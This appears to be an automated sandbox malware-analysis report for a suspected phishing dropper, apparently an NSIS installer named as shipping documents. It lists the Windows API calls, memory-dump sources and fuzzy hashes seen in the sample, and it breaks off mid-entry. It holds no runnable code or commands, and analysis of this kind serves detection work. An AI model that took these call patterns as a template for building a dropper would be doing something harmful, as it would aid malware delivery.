                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                • String ID: 9
                                                • API String ID: 1149667376-2366072709
                                                • Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                                • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
                                                • Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                                • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
                                                APIs
                                                • wsprintfW.USER32 ref: 100024E1
                                                • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                                                  • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,7591FFC0,100011AA,?,00000000), ref: 1000131E
                                                • GlobalFree.KERNEL32(?), ref: 10002562
                                                • GlobalFree.KERNEL32(00000000), ref: 1000258B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                • String ID:
                                                • API String ID: 2435812281-0
                                                • Opcode ID: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
                                                • Instruction ID: c19482fd6b93636a14d77dfdabfb39ecfcb824cf15b2f076733b0032149e6b96
                                                • Opcode Fuzzy Hash: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
                                                • Instruction Fuzzy Hash: B13104B1405A06EFF621DFA4CC9492BBBBCFB403D6722491AF6419216DCB319C50DF64
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                                                • GlobalFree.KERNEL32(00000000), ref: 00402875
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                • String ID:
                                                • API String ID: 3294113728-0
                                                • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
                                                • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000), ref: 00402D33
                                                • GetTickCount.KERNEL32 ref: 00402D51
                                                • wsprintfW.USER32 ref: 00402D7F
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                  • Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll), ref: 004051FF
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
                                                • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
                                                  • Part of subcall function 00402CFC: MulDiv.KERNEL32(00008000,00000064,0000635D), ref: 00402D11
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 722711167-2449383134
                                                • Opcode ID: b0884d8abb178ad893e14911fb0f190e16fa5082e452b5273130ec05a42c8e44
                                                • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
                                                • Opcode Fuzzy Hash: b0884d8abb178ad893e14911fb0f190e16fa5082e452b5273130ec05a42c8e44
                                                • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
                                                • GetMessagePos.USER32 ref: 00404A7F
                                                • ScreenToClient.USER32(?,?), ref: 00404A99
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
                                                • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
                                                • wsprintfW.USER32 ref: 00402CCF
                                                • SetWindowTextW.USER32(?,?), ref: 00402CDF
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                • API String ID: 1451636040-1158693248
                                                • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
                                                • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
                                                APIs
                                                • lstrlenW.KERNEL32(?), ref: 10002391
                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                                                • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                                                • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                                                • GlobalFree.KERNEL32(00000000), ref: 1000241A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                • String ID:
                                                • API String ID: 3579998418-0
                                                • Opcode ID: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                                                • Instruction ID: d73bd5747cd055fead3767a403609930cc226346ea8e15a1dc9f8d9e67d80713
                                                • Opcode Fuzzy Hash: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                                                • Instruction Fuzzy Hash: AC419FB4504706EFF324DF249C94A6A77ECFB443D0F11892DF98AC6199CB34AA94CB61
                                                APIs
                                                  • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                  • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                • GlobalFree.KERNEL32(?), ref: 10001928
                                                • GlobalFree.KERNEL32(?), ref: 10001AB9
                                                • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: FreeGlobal$lstrcpy
                                                • String ID:
                                                • API String ID: 176019282-0
                                                • Opcode ID: 23cb6935698cfd0a96148ac87a657a1f9b0a21a4783a8882718e901bc2f46f3e
                                                • Instruction ID: 9dc2e970d319025c61fe02030ab53e3dbd452a3027dd4f32e7c9f695cea78b30
                                                • Opcode Fuzzy Hash: 23cb6935698cfd0a96148ac87a657a1f9b0a21a4783a8882718e901bc2f46f3e
                                                • Instruction Fuzzy Hash: D451C536F0111AEBFB10DFA488805EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                                                • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                                                • RegCloseKey.ADVAPI32(?), ref: 00402C03
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
                                                • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                • DeleteObject.GDI32(00000000), ref: 00401D36
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
                                                • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
                                                • Opcode Fuzzy Hash: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
                                                • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
                                                APIs
                                                • GetDC.USER32(?), ref: 00401D44
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID:
                                                • API String ID: 3808545654-0
                                                • Opcode ID: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
                                                • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
                                                • Opcode Fuzzy Hash: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
                                                • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
                                                APIs
                                                • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
                                                • wsprintfW.USER32 ref: 00404A10
                                                • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
                                                • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
